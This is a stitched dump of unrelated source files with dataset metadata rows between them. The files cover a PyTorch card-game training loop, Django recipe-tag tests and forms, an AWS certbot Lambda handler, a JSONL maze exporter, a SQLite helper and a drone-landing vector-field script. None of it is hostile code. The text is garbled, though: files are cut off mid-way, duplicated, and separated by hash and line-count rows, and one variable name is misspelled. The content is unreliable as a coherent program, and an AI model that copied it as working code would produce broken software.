class_values = class_values.expand(-1, 16, self.short_mid)#.expand(-1, 16, self.n_mid)
deck_type_values = self.deck_type_eye[deck_type_datas].view(-1, 8).unsqueeze(-1)#.to(stats.device)
deck_type_values = deck_type_values.expand(-1, 8, self.short_mid)#.expand(-1, 8, self.n_mid)
x1 = self.ability_eye[follower_abilities]
x1 = torch.sum(x1,dim=2)
abilities = x1#.to(stats.device)
#src1 = follower_card_ids#self.emb1(follower_card_ids)(-1,10)→(-1,10,20)
src1 = self.emb1(follower_card_ids)
follower_cards = self.prelu_layer(self.field_value_layer(src1).view(-1, 10, 10))
# (-1,10,10) = (batch_size, max_field_card_num, self.field_value_layer(src1))
x2 = torch.cat([stats, abilities,follower_cards,able_to_attack,able_to_creature_attack,able_to_evo],dim=2)
_follower_values = self.prelu_layer(self.value_layer(x2))
follower_values = _follower_values
src2 = self.emb1(amulet_card_ids)
amulet_cards = self.prelu_layer(self.field_value_layer(src2).view(-1, 10,10))
# (-1,10,10) = (batch_size, max_field_card_num, self.field_value_layer(src2))
_amulet_values = torch.sigmoid(self.amulet_value_layer(amulet_cards))#amulet_cards
amulet_values = _amulet_values
life_values = self.prelu_layer(self.life_layer(life_datas)).view(-1, 1,self.short_mid)
src3 = self.emb1(hand_ids)
hand_cards = self.prelu_layer(self.hand_value_layer(src3).view(-1, 9,10))
# (-1,9,10) = (batch_size, max_hand_size, self.hand_value_layer(src3))
_hand_card_values = torch.sigmoid(self.hand_integrate_layer(hand_cards))
hand_card_values = _hand_card_value
src4 = deck_datas#self.emb1(deck_datas)
src4 = self.emb1(deck_datas)
deck_cards = self.prelu_layer(self.deck_value_layer(src4).view(-1, 40,10))
# (-1,40,10) = (batch_size, max_deck_size, self.deck_value_layer(src4))
_deck_card_values = torch.sigmoid(self.deck_integrate_layer(deck_cards))#deck_cards
deck_card_values = _deck_card_values
input_tensor = [follower_values,amulet_values,life_values,\
class_values,deck_type_values,hand_card_values,deck_card_values]
before_x = torch.cat(input_tensor,dim=1)
x = self.prelu_layer(self.concat_layer(before_x)).view(-1,94*self.short_mid)#+before_x).view(-1,94*self.short_mid)
for i in range(self.modify_layer_num):
x = self.prelu_layer(self.modify_layer[i](x))
return x
def get_data(f,player_num=0):
hand_ids = []
hand_card_costs = []
player = f.players[player_num]
opponent = f.players[1-player_num]
hand_ids = [names.index(card.name) for card in player.hand]
hand_card_costs = [card.cost/20 for card in player.hand]
hand_ids.extend([0]*(9-len(player.hand)))
hand_card_costs.extend([0]*(9-len(player.hand)))
deck_data = sorted([names.index(card.name)# ((Card_Category[card.card_category].value-1)*1000+card.card_id+500)
for card in player.deck.deck])
deck_data.extend([0]*(40-len(player.deck.deck)))
opponent_num = 1- player_num
opponent_creature_location = f.get_creature_location()[opponent_num]
opponent_mask = [1 if i in opponent_creature_location else 0 for i in range(5)]
able_to_evo = f.get_able_to_evo(player)
able_to_evo = [1 if i in able_to_evo else 0 for i in range(5)] + opponent_mask
follower_card_ids = [names.index(f.card_location[player_num][i].name)
if i < len(f.card_location[player_num])
and f.card_location[player_num][i].card_category == "Creature"
else 0 for i in range(5)] \
+ [names.index(f.card_location[opponent_num][i].name)
if i < len(f.card_location[opponent_num])
and f.card_location[opponent_num][i].card_category == "Creature"
else 0 for i in range(5)]
follower_stats = [[f.card_location[player_num][i].power/20, f.card_location[player_num][i].get_current_toughness()/20,
1, int(f.card_location[player_num][i].can_attack_to_follower()), int(f.card_location[player_num][i].can_attack_to_player()),1]
if i < len(f.card_location[player_num])
and f.card_location[player_num][i].card_category == "Creature"
else [0, 0, 0, 0, 0,0] for i in range(5)] \
+ [[f.card_location[opponent_num][i].power/20, f.card_location[opponent_num][i].get_current_toughness()/20,
1, 1, 1, 1]
if i < len(f.card_location[opponent_num])
and f.card_location[opponent_num][i].card_category == "Creature"
else [0, 0, 0, 0, 0, 0] for i in range(5)]
follower_abilities = [f.card_location[player_num][i].ability[:]
if i < len(f.card_location[player_num])
and f.card_location[player_num][i].card_category == "Creature"
else [] for i in range(5)] \
+ [f.card_location[opponent_num][i].ability[:]
if i < len(f.card_location[opponent_num])
and f.card_location[opponent_num][i].card_category == "Creature"
else [] for i in range(5)]
amulet_card_ids = [names.index(f.card_location[player_num][i].name)#f.card_location[player_num][i].card_id + 500
if i < len(f.card_location[player_num])
and f.card_location[player_num][i].card_category == "Amulet"
else 0 for i in range(5)] \
+ [names.index(f.card_location[opponent_num][i].name)
if i < len(f.card_location[opponent_num])
and f.card_location[opponent_num][i].card_category == "Amulet"
else 0 for i in range(5)]
able_to_play = f.get_able_to_play(player)
able_to_play = [1 if i in able_to_play else 0 for i in range(9)]
able_to_attack = f.get_able_to_attack(player)
able_to_attack = [1 if i in able_to_attack else 0 for i in range(5)] + opponent_mask
able_to_creature_attack = f.get_able_to_creature_attack(player)
able_to_creature_attack = [1 if i in able_to_creature_attack else 0 for i in range(5)] + opponent_mask
life_data = [player.life/20, opponent.life/20, len(player.hand)/10, len(opponent.hand)/10,f.current_turn[player_num]/10]
pp_data = [f.cost[player_num]/10, f.remain_cost[player_num]/10,f.cost[1-player_num]/10, f.remain_cost[1-player_num]/10]
#共に0~1に正規化
class_data = [player.deck.leader_class.value,
opponent.deck.leader_class.value]
deck_type_data = [player.deck.deck_type,opponent.deck.deck_type]
life_data = (life_data, class_data,deck_type_data)
# datas = Detailed_State_data(hand_ids, hand_card_costs, follower_card_ids, amulet_card_ids,
# follower_stats, follower_abilities, able_to_evo, life_data, pp_data,
# able_to_play, able_to_attack, able_to_creature_attack,deck_data)
datas = {"hand_ids":hand_ids,
"hand_card_costs":hand_card_costs,
"follower_card_ids":follower_card_ids,
"amulet_card_ids":amulet_card_ids,
"follower_stats":follower_stats,
"follower_abilities":follower_abilities,
"able_to_evo":able_to_evo,
"life_data":life_data,
"pp_data":pp_data,
"able_to_play":able_to_play,
"able_to_attack":able_to_attack,
"able_to_creature_attack":able_to_creature_attack,
"deck_data":deck_data}
return datas
deck_id_2_name = {0: "Sword_Aggro", 1: "Rune_Earth", 2: "Sword", 3: "Shadow", 4: "Dragon_PDK", 5: "Haven",
6: "Blood", 7: "Dragon", 8: "Forest", 9: "Rune", 10: "DS_Rune", -1: "Forest_Basic", -2: "Sword_Basic",
-3: "Rune_Basic",
-4: "Dragon_Basic", -5: "FOREST_Basic", -6: "Blood_Basic", -7: "Haven_Basic", -8: "Portal_Basic",
100: "TEST",
-9: "Spell-Rune", 11: "PtP-Forest", 12: "Mid-Shadow", 13: "Neutral-Blood"}
key_2_tsv_name = {0: ["Sword_Aggro.tsv", "SWORD"], 1: ["Rune_Earth.tsv", "RUNE"], 2: ["Sword.tsv", "SWORD"],
3: ["New-Shadow.tsv", "SHADOW"], 4: ["Dragon_PDK.tsv", "DRAGON"], 5: ["Test-Haven.tsv", "HAVEN"],
6: ["Blood.tsv", "BLOOD"], 7: ["Dragon.tsv", "DRAGON"], 8: ["Forest.tsv", "FOREST"],
9: ["SpellBoost-Rune.tsv", "RUNE"], 10: ["Dimension_Shift_Rune.tsv", "RUNE"],
11: ["PtP_Forest.tsv", "FOREST"], 12: ["Mid_Shadow.tsv", "SHADOW"],
13: ["Neutral_Blood.tsv", "BLOOD"],100: ["TEST.tsv", "SHADOW"],
-2: ["Sword_Basic.tsv", "SWORD"]}
# +
def deck_id_2_deck_type(type_num):
if type_num in [0,1]:
return DeckType.AGGRO.value
elif type_num in [5,6,7]:
return DeckType.CONTROL.value
elif type_num in [8,9,10,-9,11]:
return DeckType.COMBO.value
else:
return DeckType.MID.value
# -
if __name__ == "__main__":
parser = argparse.ArgumentParser(description='デュアルニューラルネットワーク学習コード')
parser.add_argument('--episode_num', help='試行回数')
parser.add_argument('--iteration_num', help='イテレーション数')
parser.add_argument('--epoch_num', help='エポック数')
parser.add_argument('--batch_size', help='バッチサイズ')
parser.add_argument('--mcts', help='サンプリングAIをMCTSにする(オリジナルの場合は[OM])')
parser.add_argument('--deck', help='サンプリングに用いるデッキの選び方')
parser.add_argument('--cuda', help='gpuを使用するかどうか')
parser.add_argument('--multi_train', help="学習時も並列化するかどうか")
parser.add_argument('--epoch_interval', help="モデルの保存間隔")
parser.add_argument('--fixed_deck_id', help="使用デッキidの固定")
parser.add_argument('--cpu_num', help="使用CPU数", default=2 if torch.cuda.is_available() else 3)
parser.add_argument('--batch_num', help='サンプルに対するバッチの数')
args = parser.parse_args()
deck_flg = int(args.fixed_deck_id) if args.fixed_deck_id is not None else None
args = parser.parse_args()
net = New_Dual_Net(100)
if torch.cuda.is_available() and args.cuda == "True":
net = net.cuda()
print("cuda is available.")
cuda_flg = args.cuda == "True"
from emulator_test import * # importの依存関係により必ず最初にimport
from Field_setting import *
from Player_setting import *
from Policy import *
from Game_setting import Game
#deck_sampling_type = False
#if args.deck is not None:
# deck_sampling_type = True
G = Game()
episode_len = 100
if args.episode_num is not None:
episode_len = int(args.episode_num)
batch_size = 100
if args.batch_size is not None:
batch_size = int(args.batch_size)
iteration = 10
if args.iteration_num is not None:
iteration = int(args.iteration_num)
epoch_num = 2
if args.epoch_num is not None:
epoch_num = int(args.epoch_num)
mcts = False
if args.mcts is not None:
mcts = True
import datetime
t1 = datetime.datetime.now()
print(t1)
#print(net)
R = New_Dual_ReplayMemory(100000)
net.zero_grad()
prev_net = copy.deepcopy(net)
import os
optimizer = optim.Adam(net.parameters(), weight_decay=0.01)
for epoch in range(epoch_num):
print("epoch {}".format(epoch+1))
R = New_Dual_ReplayMemory(100000)
p1 = Player(9, True, policy=New_Dual_NN_Non_Rollout_OM_ISMCTSPolicy(origin_model=net, cuda=cuda_flg))
p1.name = "Alice"
p2 = Player(9, False, policy=New_Dual_NN_Non_Rollout_OM_ISMCTSPolicy(origin_model=prev_net, cuda=cuda_flg))
p2.name = "Bob"
win_num = 0
for episode in tqdm(range(episode_len)):
f = Field(5)
deck_type1 = deck_flg
deck_type2 = deck_flg
if deck_flg is None:
deck_type1 = random.choice(list(key_2_tsv_name.keys()))
deck_type2 = random.choice(list(key_2_tsv_name.keys()))
d1 = tsv_to_deck(key_2_tsv_name[deck_type1][0])
d1.set_leader_class(key_2_tsv_name[deck_type1][1])
d2 = tsv_to_deck(key_2_tsv_name[deck_type2][0])
d2.set_leader_class(key_2_tsv_name[deck_type2][1])
d1.shuffle()
d2.shuffle()
p1.deck = d1
p2.deck = d2
f.players = [p1, p2]
p1.field = f
p2.field = f
#import cProfile
#cProfile.run("G.start_for_dual(f, virtual_flg=True, target_player_num=episode % 2)",sort="tottime")
#assert False
train_data, reward = G.start_for_dual(f, virtual_flg=True, target_player_num=episode % 2)
f.players[0].life = 20
f.players[0].hand.clear()
f.players[0].deck = None
f.players[0].lib_out_flg = False
f.players[1].life = 20
f.players[1].hand.clear()
f.players[1].deck = None
f.players[1].lib_out_flg = False
for i in range(2):
for data in train_data[i]:
R.push(data[0], data[1], data[2], data[3], reward[i])
win_num += int(reward[episode % 2] > 0)
print("sample_size:{}".format(len(R.memory)))
print("win_rate:{:.2%}".format(win_num/episode_len))
prev_net = copy.deepcopy(net)
sum_of_loss = 0
sum_of_MSE = 0
sum_of_CEE = 0
p,pai,z,states,loss = None, None, None, None,None
current_net, prev_optimizer = None, None
for i in tqdm(range(iteration)):
print("\ni:{}\n".format(i))
states, actions, rewards = R.sample(batch_size)
states['target'] = {'actions':actions, 'rewards':rewards}
p, v, loss = net(states,target=True)
z = rewards
pai = actions#45種類の抽象化した行動
if (i + 1) % 100== 0:
print("target:{} output:{}".format(z[0],v[0]))
print("target:{} output:{}".format(pai[0], p[0]))
print("loss:{}".format([loss[j].item() for j in range(3)]))
if torch.isnan(loss):
# section 3
net = current_net
optimizer = torch.optim.Adam(net.parameters())
optimizer.load_state_dict(prev_optimizer.state_dict())
else:
current_net = copy.deepcopy(net)
prev_optimizer = copy.deepcopy(optimizer)
optimizer.zero_grad()
loss[0].backward()
sum_of_loss += float(loss[0].item())
sum_of_MSE += float(loss[1].item())
sum_of_CEE += float(loss[2].item())
optimizer.step()
print("{}".format(epoch + 1))
print("AVE | Over_All_Loss: {:.3f} | MSE: {:.3f} | CEE:{:.3f}"\
.format(sum_of_loss/iteration,sum_of_MSE/iteration,sum_of_CEE/iteration))
if torch.isnan(loss[0]):
for key in list(net.state_dict().keys()):
print(key, net.state_dict()[key].size())
if len(net.state_dict()[key].size()) == 1:
print(torch.max(net.state_dict()[key], dim=0), "\n", torch.min(net.state_dict()[key], dim=0))
else:
print(torch.max(net.state_dict()[key], 0), "\n", torch.min(net.state_dict()[key], 0))
print("")
assert False
if epoch_num > 4 and (epoch+1) % (epoch_num//4) == 0 and epoch+1 < epoch_num:
PATH = "model/Dual_{}_{}_{}_{}_{}_{}_{:.0%}.pth".format(t1.year, t1.month, t1.day, t1.hour, t1.minute,
t1.second, (epoch+1)/epoch_num)
if torch.cuda.is_available() and cuda_flg:
PATH = "model/Dual_{}_{}_{}_{}_{}_{}_{:.0%}_cuda.pth".format(t1.year, t1.month, t1.day, t1.hour, t1.minute,
t1.second, (epoch + 1) / epoch_num)
torch.save(net.state_dict(), PATH)
print("{} is saved.".format(PATH))
print('Finished Training')
#PATH = './value_net.pth'
#PATH = './value_net.pth'
PATH = "model/Dual_{}_{}_{}_{}_{}_{}_all.pth".format(t1.year, t1.month, t1.day, t1.hour, t1.minute,
t1.second)
if torch.cuda.is_available() and cuda_flg:
PATH = "model/Dual_{}_{}_{}_{}_{}_{}_all_cuda.pth".format(t1.year, t1.month, t1.day, t1.hour, t1.minute,
t1.second)
torch.save(net.state_dict(), PATH)
print("{} is saved.".format(PATH))
t2 = datetime.datetime.now()
print(t2)
print(t2-t1)
| 20,388 | 35 | 408 |
7cfa0517f6f611e9e8a1d7cb043611f70bfb1a0f | 2,196 | py | Python | app/recipe/tests/test_tag_api.py | Ivanrputra/recipe-app-api | e70548a4f7f8756f8f4224dcf39b809a8b546da1 | [
"MIT"
] | null | null | null | app/recipe/tests/test_tag_api.py | Ivanrputra/recipe-app-api | e70548a4f7f8756f8f4224dcf39b809a8b546da1 | [
"MIT"
] | null | null | null | app/recipe/tests/test_tag_api.py | Ivanrputra/recipe-app-api | e70548a4f7f8756f8f4224dcf39b809a8b546da1 | [
"MIT"
] | null | null | null | from django.contrib.auth import get_user_model
from django.urls import reverse
from django.test import TestCase
from rest_framework import status
from rest_framework.test import APIClient
from core.models import Tag
from recipe.serializers import TagSerializer
TAGS_URL = reverse('recipe:tag-list')
# test the publicly avalialbel tags api
# test the authorized user tags api | 28.894737 | 64 | 0.754554 | from django.contrib.auth import get_user_model
from django.urls import reverse
from django.test import TestCase
from rest_framework import status
from rest_framework.test import APIClient
from core.models import Tag
from recipe.serializers import TagSerializer
TAGS_URL = reverse('recipe:tag-list')
class PublicTagsApiTest(TestCase):
# test the publicly avalialbel tags api
def setUp(self):
self.client = APIClient()
def test_login_required(self):
# test that login is required for retrieving tags
res = self.client.get(TAGS_URL)
self.assertEqual(res.status_code,status.HTTP_401_UNAUTHORIZED)
class PrivateTagsApiTest(TestCase):
# test the authorized user tags api
def setUp(self):
self.user = get_user_model().objects.create_user(
'ivanrputa@gmail.com',
'12345678'
)
self.client = APIClient()
self.client.force_authenticate(self.user)
def test_retrieve_tags(self):
# test retrieving tags
Tag.objects.create(user=self.user,name='Vegan')
Tag.objects.create(user=self.user,name='Dessert')
res = self.client.get(TAGS_URL)
tags = Tag.objects.all().order_by('-name')
serializers = TagSerializer(tags,many=True)
self.assertEqual(res.status_code,status.HTTP_200_OK)
self.assertEqual(res.data,serializers.data)
def test_tags_limited_to_user(self):
# Test that tags returned are for authorized user
user2 = get_user_model().objects.create_user(
'ivanrputra2@gmail.com',
'123457789'
)
Tag.objects.create(user=user2,name="Fruit")
tag = Tag.objects.create(user=self.user,name="Comfort food")
res = self.client.get(TAGS_URL)
self.assertEqual(res.status_code,status.HTTP_200_OK)
self.assertEqual(len(res.data),1)
self.assertEqual(res.data[0]['name'],tag.name)
def test_create_tag_successful(self):
# testcreating a new tag
payload = {'name':"Test Tag"}
self.client.post(TAGS_URL,payload)
exists = Tag.objects.filter(
user = self.user,
name = payload['name']
).exists()
self.assertTrue(exists)
def test_create_tag_invalid(self):
# creating a new tag with invalid payload
payload = {'name':''}
res = self.client.post(TAGS_URL,payload)
self.assertEqual(res.status_code,status.HTTP_400_BAD_REQUEST) | 1,576 | 27 | 213 |
5b244dbad1c8ca8a9375ead11274a786704c74b2 | 789 | py | Python | gardenizer/event/forms.py | plegulluche/OPC-P13 | 0bad4e1bd7293e5a3397611f80df00ca2fd9cf60 | [
"Unlicense"
] | null | null | null | gardenizer/event/forms.py | plegulluche/OPC-P13 | 0bad4e1bd7293e5a3397611f80df00ca2fd9cf60 | [
"Unlicense"
] | null | null | null | gardenizer/event/forms.py | plegulluche/OPC-P13 | 0bad4e1bd7293e5a3397611f80df00ca2fd9cf60 | [
"Unlicense"
] | null | null | null | from django import forms
from event.models import Customer, Evenement
| 19.725 | 47 | 0.52218 | from django import forms
from event.models import Customer, Evenement
class AddCustomerForm(forms.ModelForm):
class Meta:
model = Customer
fields = (
"firstname",
"lastname",
"phone",
"company",
"street_number",
"streetname",
"city",
)
class AddMaintenanceEventForm(forms.ModelForm):
event_start = forms.DateTimeField()
event_end = forms.DateTimeField()
class Meta:
model = Evenement
fields = (
"title",
"description",
)
class AddCustomerEventForm(forms.ModelForm):
class Meta:
model = Evenement
fields = (
"title",
"description",
"customer",
)
| 0 | 647 | 69 |
470a6e476d032e3bf06631db5a62d5885240fdf0 | 1,184 | py | Python | app/handler.py | KiraLT/certbot-lambda | 3bec9e3575a67345849778f55227836591c5eee7 | [
"MIT"
] | 2 | 2022-01-19T07:27:30.000Z | 2022-02-08T17:25:23.000Z | app/handler.py | KiraLT/certbot-lambda | 3bec9e3575a67345849778f55227836591c5eee7 | [
"MIT"
] | null | null | null | app/handler.py | KiraLT/certbot-lambda | 3bec9e3575a67345849778f55227836591c5eee7 | [
"MIT"
] | 1 | 2022-02-16T14:38:36.000Z | 2022-02-16T14:38:36.000Z | #!/usr/bin/env python3
import shutil
from app.settings import settings
from app.services.certbot import obtain_certbot_certs
from app.services.aws import list_secret_names, upload_certs_as_secrets
if __name__ == "__main__":
handler(None, None)
| 29.6 | 80 | 0.697635 | #!/usr/bin/env python3
import shutil
from app.settings import settings
from app.services.certbot import obtain_certbot_certs
from app.services.aws import list_secret_names, upload_certs_as_secrets
def handler(_event, _context):
try:
shutil.rmtree(str(settings.CERTBOT_DIR), ignore_errors=True)
# Load secret names early to check if aws client is configured correctly
secret_names = list_secret_names()
certs = obtain_certbot_certs(
emails=settings.CERTBOT_EMAILS,
domains=settings.CERTBOT_DOMAINS,
dns_plugin=settings.CERTBOT_DNS_PLUGIN,
certbot_dir=settings.CERTBOT_DIR,
certbot_server=settings.CERTBOT_SERVER,
preferred_chain=settings.CERTBOT_PREFERRED_CHAIN
)
upload_certs_as_secrets(
certs,
name=settings.AWS_SECRET_NAME,
secret_names=secret_names,
description=settings.AWS_SECRET_DESCRIPTION
)
finally:
shutil.rmtree(str(settings.CERTBOT_DIR), ignore_errors=True)
return "Certificates obtained and uploaded successfully."
if __name__ == "__main__":
handler(None, None)
| 908 | 0 | 23 |
5a2b9719bea651a230205b8011c0b27198c10cbf | 23 | py | Python | something-learned/Algorithms and Data-Structures/Competitive-programming-library/CP/codeforces/656A-Da_Vinci_Powers.py | gopala-kr/CR-101 | dd27b767cdc0c667655ab8e32e020ed4248bd112 | [
"MIT"
] | 5 | 2018-05-09T04:02:04.000Z | 2021-02-21T19:27:56.000Z | something-learned/Algorithms and Data-Structures/Competitive-programming-library/CP/codeforces/656A-Da_Vinci_Powers.py | gopala-kr/CR-101 | dd27b767cdc0c667655ab8e32e020ed4248bd112 | [
"MIT"
] | null | null | null | something-learned/Algorithms and Data-Structures/Competitive-programming-library/CP/codeforces/656A-Da_Vinci_Powers.py | gopala-kr/CR-101 | dd27b767cdc0c667655ab8e32e020ed4248bd112 | [
"MIT"
] | 5 | 2018-02-23T22:08:28.000Z | 2020-08-19T08:31:47.000Z | x = input()
print 2**x
| 7.666667 | 11 | 0.565217 | x = input()
print 2**x
| 0 | 0 | 0 |
75ac623f7b66719ba7e41213f1ae301dee5d15a5 | 89 | py | Python | enthought/mayavi/tools/modules.py | enthought/etsproxy | 4aafd628611ebf7fe8311c9d1a0abcf7f7bb5347 | [
"BSD-3-Clause"
] | 3 | 2016-12-09T06:05:18.000Z | 2018-03-01T13:00:29.000Z | enthought/mayavi/tools/modules.py | enthought/etsproxy | 4aafd628611ebf7fe8311c9d1a0abcf7f7bb5347 | [
"BSD-3-Clause"
] | 1 | 2020-12-02T00:51:32.000Z | 2020-12-02T08:48:55.000Z | enthought/mayavi/tools/modules.py | enthought/etsproxy | 4aafd628611ebf7fe8311c9d1a0abcf7f7bb5347 | [
"BSD-3-Clause"
] | null | null | null | # proxy module
from __future__ import absolute_import
from mayavi.tools.modules import *
| 22.25 | 38 | 0.831461 | # proxy module
from __future__ import absolute_import
from mayavi.tools.modules import *
| 0 | 0 | 0 |
b20f312d2d730133f52e15d77c7b0a9506e0f4bd | 454 | py | Python | backend/urls.py | Rayman/fusic-django | a3bc19cb5d0a013df649e5f59941c98c7ffec159 | [
"MIT"
] | null | null | null | backend/urls.py | Rayman/fusic-django | a3bc19cb5d0a013df649e5f59941c98c7ffec159 | [
"MIT"
] | 14 | 2020-02-11T21:32:22.000Z | 2022-02-26T02:10:23.000Z | backend/urls.py | Rayman/fusic-django | a3bc19cb5d0a013df649e5f59941c98c7ffec159 | [
"MIT"
] | 1 | 2019-03-07T04:04:02.000Z | 2019-03-07T04:04:02.000Z | from django.conf.urls import url
from django.urls import include
from rest_framework.routers import DefaultRouter
from . import views
router = DefaultRouter()
router.register(r"users", views.UserViewSet)
router.register(r"playlists", views.PlaylistViewSet)
router.register(r"radios", views.RadioViewSet)
router.register(r"songs", views.SongViewSet)
urlpatterns = router.urls
urlpatterns += [
url(r"^api-auth/", include("rest_framework.urls")),
]
| 25.222222 | 55 | 0.779736 | from django.conf.urls import url
from django.urls import include
from rest_framework.routers import DefaultRouter
from . import views
router = DefaultRouter()
router.register(r"users", views.UserViewSet)
router.register(r"playlists", views.PlaylistViewSet)
router.register(r"radios", views.RadioViewSet)
router.register(r"songs", views.SongViewSet)
urlpatterns = router.urls
urlpatterns += [
url(r"^api-auth/", include("rest_framework.urls")),
]
| 0 | 0 | 0 |
a1c9431bd64c2749eaeedd18e74822b26b4497e1 | 2,007 | py | Python | minotaur/scripts/jsonl.py | csmith49/minotaur | 982e128b440e2c8fe96c450505dfdac9a37f9551 | [
"MIT"
] | null | null | null | minotaur/scripts/jsonl.py | csmith49/minotaur | 982e128b440e2c8fe96c450505dfdac9a37f9551 | [
"MIT"
] | null | null | null | minotaur/scripts/jsonl.py | csmith49/minotaur | 982e128b440e2c8fe96c450505dfdac9a37f9551 | [
"MIT"
] | null | null | null | import click
from .cli import cli
from ..maze import Maze
from ..interface import load, is_context, is_value
from json import dumps
from sys import stdout
from typing import Iterable, Callable, Tuple, TypeVar
from itertools import chain, filterfalse, tee
T = TypeVar("T")
def partition(iterable : Iterable[T], predicate : Callable[[T], bool]) -> Tuple[Iterable[T], Iterable[T]]:
"""Partition an iterable by a predicate."""
iter1, iter2 = tee(iterable)
return filterfalse(predicate, iter1), filter(predicate, iter2)
def entries(maze : Maze) -> Iterable:
"""Convert a maze to a sequence of rows in a JSONL-encoded table."""
if is_context(maze):
values, contexts = partition(maze.mazes(), is_context)
# pre-populate the entry with the values
entry = {value.symbol : value.value for value in values}
# tag the maze symbol with the key
entry[f"{maze.symbol}:key"] = maze.key
# and add the duration
entry[f"{maze.symbol}:duration"] = maze.value.duration
# now, merge with all the sub-contexts (if they exist!)
contexts = list(contexts)
if contexts:
context_entries = (entries(context) for context in contexts)
for context_entry in chain.from_iterable(context_entries):
yield {**entry, **context_entry}
else:
yield entry
def dump(maze : Maze, fp):
"""Dump the paths of a maze to the provided file pointer."""
for entry in entries(maze):
fp.write(f"{dumps(entry)}\n")
@cli.command()
@click.argument("filepath")
@click.option("-o", "--output", type=str, help="Output file to which rows will be appended.")
def jsonl(filepath, output):
"""Convert a message log into a JSONL-encoded table."""
mazes = load(filepath=filepath)
if output:
with open(output, "a") as f:
for maze in mazes:
dump(maze, f)
else:
for maze in mazes:
dump(maze, stdout)
| 30.876923 | 106 | 0.63727 | import click
from .cli import cli
from ..maze import Maze
from ..interface import load, is_context, is_value
from json import dumps
from sys import stdout
from typing import Iterable, Callable, Tuple, TypeVar
from itertools import chain, filterfalse, tee
T = TypeVar("T")
def partition(iterable : Iterable[T], predicate : Callable[[T], bool]) -> Tuple[Iterable[T], Iterable[T]]:
"""Partition an iterable by a predicate."""
iter1, iter2 = tee(iterable)
return filterfalse(predicate, iter1), filter(predicate, iter2)
def entries(maze : Maze) -> Iterable:
"""Convert a maze to a sequence of rows in a JSONL-encoded table."""
if is_context(maze):
values, contexts = partition(maze.mazes(), is_context)
# pre-populate the entry with the values
entry = {value.symbol : value.value for value in values}
# tag the maze symbol with the key
entry[f"{maze.symbol}:key"] = maze.key
# and add the duration
entry[f"{maze.symbol}:duration"] = maze.value.duration
# now, merge with all the sub-contexts (if they exist!)
contexts = list(contexts)
if contexts:
context_entries = (entries(context) for context in contexts)
for context_entry in chain.from_iterable(context_entries):
yield {**entry, **context_entry}
else:
yield entry
def dump(maze : Maze, fp):
"""Dump the paths of a maze to the provided file pointer."""
for entry in entries(maze):
fp.write(f"{dumps(entry)}\n")
@cli.command()
@click.argument("filepath")
@click.option("-o", "--output", type=str, help="Output file to which rows will be appended.")
def jsonl(filepath, output):
"""Convert a message log into a JSONL-encoded table."""
mazes = load(filepath=filepath)
if output:
with open(output, "a") as f:
for maze in mazes:
dump(maze, f)
else:
for maze in mazes:
dump(maze, stdout)
| 0 | 0 | 0 |
006cfef7d4a9b065e2e1a48f2fd3b717d9a8e288 | 1,356 | py | Python | gdsync/google/finished_folders.py | UUUM/backup-google-drive | ad632f5deb824237ca4a51af5e76a4261cc4759e | [
"MIT"
] | 6 | 2016-08-09T12:00:48.000Z | 2018-03-05T04:59:48.000Z | gdsync/google/finished_folders.py | UUUM/backup-google-drive | ad632f5deb824237ca4a51af5e76a4261cc4759e | [
"MIT"
] | null | null | null | gdsync/google/finished_folders.py | UUUM/backup-google-drive | ad632f5deb824237ca4a51af5e76a4261cc4759e | [
"MIT"
] | null | null | null | import os
import sqlite3
import gdsync
| 22.6 | 74 | 0.544985 | import os
import sqlite3
import gdsync
class FinishedFolders(set):
db_file_name = 'default.db'
db_file = None
table = 'finished_folders'
_conn = None
def __init__(self):
if self.db_file is None:
self.db_file = os.path.join(gdsync.VAR_DIR, self.db_file_name)
def __exit__(self):
if self._conn is not None:
self._conn.close()
@property
def conn(self):
if not self._conn:
self._conn = self._connect()
self._initialize_table()
return self._conn
def load(self):
sql = 'select id from %s' % self.table
for row in self.conn.execute(sql):
self.add(row[0])
return self
def save(self):
for id in self:
self.conn.execute('''
insert or replace into %s (id)
values (?)
''' % self.table, (id,))
self.conn.commit()
return self
def _connect(self):
db_dir = os.path.dirname(self.db_file)
if not os.path.exists(db_dir):
os.makedirs(db_dir)
return sqlite3.connect(self.db_file)
def _initialize_table(self):
self.conn.execute('''
create table if not exists %s (
id text not null unique
)
''' % self.table)
return self
| 983 | 309 | 23 |
5b71d011d822f95ce25f55c2574551dc96b232fe | 1,860 | py | Python | examples/guidage.py | MaxLgy/Autoland | ca94eef0d2f3dafa56cc271751d72db91d704098 | [
"MIT"
] | null | null | null | examples/guidage.py | MaxLgy/Autoland | ca94eef0d2f3dafa56cc271751d72db91d704098 | [
"MIT"
] | null | null | null | examples/guidage.py | MaxLgy/Autoland | ca94eef0d2f3dafa56cc271751d72db91d704098 | [
"MIT"
] | 1 | 2021-05-16T15:20:19.000Z | 2021-05-16T15:20:19.000Z | from numpy import cross, array , vdot
from numpy.linalg import norm
import matplotlib.pyplot as plt
from roblib import *
def vct_nrm(a,b,c):
"""Soit a,b,c trois coin de la plateforme supossée carrée, n est un vecteur normal de cette platforme"""
V1 = a-b
V2 = a-c
n = cross(V1,V2).T
return n/norm(n)
def champ(p,n,phat,v_d):
"""p position du drone, n vecteur normal à la plateforme, phat point cible où attérir, v_d vecteur vitesse de la plateforme"""
calc1 = cross(n.T,(p-phat).T)
pt_attract = 1*(phat-p)
vitesse_cible = 0.5*v_d
Q = 0.4*cross(n.T,calc1)+pt_attract.T + vitesse_cible
return Q
a = array([[0,5,0]])
b = array([[1,0,0]])
c = array([[0,1,0]])
n = vct_nrm(a,b,c)
print("vecteur normal = ",n)
phat = array([[100],[0],[0]]) #position point d'attérissage
p = array([[0],[0],[100]]) #position drone
Q = champ(p,n,phat)
print("n.Q",vdot(n, Q))
print("valeur du champ au point",Q)
a = a.flatten()
b = b.flatten()
c = c.flatten()
fig = figure()
ax = Axes3D(fig)
# for x in arange(0,1,0.1):
# for y in arange(0,1,0.1):
# for z in arange(0,3,0.25):
# draw_shampoing(array([[x,y,z]]).T)
# phat = phat.flatten()
# ax.scatter(phat[0],phat[1],phat[2]) #phat
# n = n.flatten()
# ax.plot([phat[0],phat[0]+3*n[0]],[phat[1],phat[1]+3*n[1]],[phat[2],phat[2]+3*n[2]]) #vecteur normal à partir de phat
# ax.plot([a[0],b[0],c[0],a[0]],[a[1],b[1],c[1],a[1]],[a[2],b[2],c[2],a[2]]) #platforme
# pause(10)
"""
plt.figure()
plt.xlim((-3,3))
plt.ylim((-3,3))
plt.plot(phat[0,0],phat[1,0],'ob')
plt.plot(p[0,0],p[1,0],'or')
